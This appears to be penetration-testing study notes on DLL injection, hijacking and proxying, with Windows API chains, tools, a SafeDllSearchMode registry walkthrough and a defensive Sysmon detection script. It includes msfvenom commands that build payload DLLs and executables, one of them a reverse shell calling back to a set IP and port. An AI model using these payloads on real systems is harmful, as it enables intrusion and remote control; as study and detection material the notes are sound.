
dll-injection

DLL injection is a method that involves inserting a piece of code, structured as a Dynamic Link Library (DLL), into a running process. There are several methods of doing this (HTB module: https://academy.hackthebox.com/module/67/section/2501):

  • LoadLibrary

  • Manual mapping

  • Reflective DLL injection

DLL hijacking is an exploitation technique in which an attacker takes advantage of the Windows DLL loading process. DLLs can be loaded at runtime, which creates a hijacking opportunity if an application does not specify the full path to a required DLL, rendering it susceptible to such attacks. The SafeDllSearchMode registry value controls the search order Windows uses; to check or set it:

  • Press Windows key + R

  • Type regedit and press enter

  • Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager.

  • Look for the SafeDllSearchMode value. If it doesn't exist, right-click on the blank space of the folder or right-click the Session Manager folder, select "New" and then "DWORD (32-bit) Value". Name this new value SafeDllSearchMode.

  • Double-click SafeDllSearchMode. In the value data field, enter 1 to enable and 0 to disable safe DLL search mode.

Generate DLL payload

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f dll > shell.dll

OR

msfvenom -p windows/exec CMD="C:\Windows\System32\calc.exe" -f dll -o malicious.dll

OR

msfvenom -p cmd/windows/powershell/exec CMD="<Your_Command>" -f exe > payload.exe

Windows API Calls (DLL Injection)

Registry (DLL Hijacking)

Process Monitoring (DLL Hijacking)

Key Concepts:

  • DLL Injection:
    - Inserting a DLL into a running process to execute arbitrary code.
    - Used for legitimate purposes (hot patching) and malicious activities.

  • LoadLibrary:
    - Windows API function for loading DLLs.
    - Can be used for remote DLL injection.

  • Manual Mapping:
    - Directly mapping DLL sections into a process's memory.
    - Bypasses LoadLibrary monitoring.

  • Reflective DLL Injection:
    - DLL loads itself from memory, minimizing host interaction.

  • DLL Hijacking:
    - Exploiting the Windows DLL search order to load a malicious DLL.
    - Relies on missing or weakly specified DLL paths.

  • DLL Proxying:
    - Creating a proxy DLL that loads the original DLL, modifies its functions, and returns the modified result.

Approach, Commands, Tools, and Techniques:

  1. LoadLibrary Injection:
    - OpenProcess, VirtualAllocEx, WriteProcessMemory, GetProcAddress, CreateRemoteThread (Windows API calls).

  2. Manual Mapping:
    - Load DLL as raw data, map sections, inject shellcode.

  3. Reflective DLL Injection:
    - ReflectiveLoader function within the DLL.
    - Parses PE headers, resolves imports, relocates DLL.

  4. DLL Hijacking:
    - Process Explorer, PE Explorer (DLL analysis).
    - Process Monitor (procmon) to monitor file access.
    - Create malicious DLLs.
    - Regedit to modify SafeDllSearchMode.

  5. DLL Proxying:
    - Create a proxy DLL that loads the original DLL.
    - Modify the desired function within the proxy DLL.
    - Replace the original DLL with the proxy DLL.
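The LoadLibrary injection chain in step 1 leaves a recognisable trace in Sysmon Event ID 8 (CreateRemoteThread): the new thread's start routine resolves to a LoadLibrary export in kernel32, while manual mapping and reflective loading (steps 2 and 3) typically leave a start address that is backed by no loaded module. The triage below is an added example, not part of the HTB module or this page; the flattened event format, the sample events and the csrss.exe allowlist are constructed assumptions for illustration.

```python
# Added example: triage Sysmon Event ID 8 (CreateRemoteThread) records for
# LoadLibrary-based injection and for unbacked thread start addresses.
from dataclasses import dataclass

# Thread start routines typical of the OpenProcess/VirtualAllocEx/
# WriteProcessMemory/CreateRemoteThread -> LoadLibrary injection pattern.
LOADLIBRARY_EXPORTS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}

# Assumed allowlist of processes that create remote threads legitimately; tune per environment.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}

@dataclass
class RemoteThreadEvent:
    source_image: str
    target_image: str
    start_module: str    # empty when the start address is not inside a loaded module
    start_function: str  # empty when no export name could be resolved

def classify(ev: RemoteThreadEvent) -> str:
    """Return 'allowlisted', 'loadlibrary-injection', 'unbacked-start' or 'benign'."""
    if ev.source_image.lower() in ALLOWED_SOURCES:
        return "allowlisted"
    if ev.start_function in LOADLIBRARY_EXPORTS:
        return "loadlibrary-injection"
    if not ev.start_module:
        return "unbacked-start"
    return "benign"

def parse_event(text: str) -> RemoteThreadEvent:
    """Parse a constructed 'Key: value|Key: value' flattening of an EID 8 event."""
    fields = {}
    for part in text.split("|"):
        key, _, value = part.partition(":")  # first colon only; paths keep their drive colon
        fields[key.strip()] = value.strip()
    return RemoteThreadEvent(fields.get("SourceImage", ""), fields.get("TargetImage", ""),
                             fields.get("StartModule", ""), fields.get("StartFunction", ""))

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    "SourceImage: C:\\Users\\bob\\injector.exe|TargetImage: C:\\Windows\\notepad.exe|StartModule: C:\\Windows\\System32\\KERNEL32.DLL|StartFunction: LoadLibraryA",
    "SourceImage: C:\\Users\\bob\\loader.exe|TargetImage: C:\\Windows\\explorer.exe|StartModule: |StartFunction: ",
    "SourceImage: C:\\Windows\\System32\\csrss.exe|TargetImage: C:\\Windows\\explorer.exe|StartModule: |StartFunction: ",
    "SourceImage: C:\\Program Files\\App\\app.exe|TargetImage: C:\\Program Files\\App\\helper.exe|StartModule: C:\\Windows\\System32\\ntdll.dll|StartFunction: RtlUserThreadStart",
]

def triage(lines=SAMPLE_EVENTS) -> list:
    """Return (source_image, verdict) pairs for each flattened event line."""
    return [(parse_event(line).source_image, classify(parse_event(line))) for line in lines]

if __name__ == "__main__":
    for src, verdict in triage():
        print(f"{verdict:22} {src}")
```

Real deployments read the fields from the Sysmon event XML rather than this flattened form, and the allowlist should be built from observed baseline activity.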

Commands:

  • Windows API calls: OpenProcess, VirtualAllocEx, WriteProcessMemory, GetProcAddress, CreateRemoteThread, LoadLibrary, FreeLibrary.

  • Regedit.

  • Process Monitor (procmon).

Tools:

  • Process Explorer.

  • PE Explorer.

  • Compilers (C).

  • Debuggers/Disassemblers.

Techniques:

  • Creating malicious DLLs.

  • Modifying DLL functions.

  • Monitoring process activity.

  • Reverse engineering.
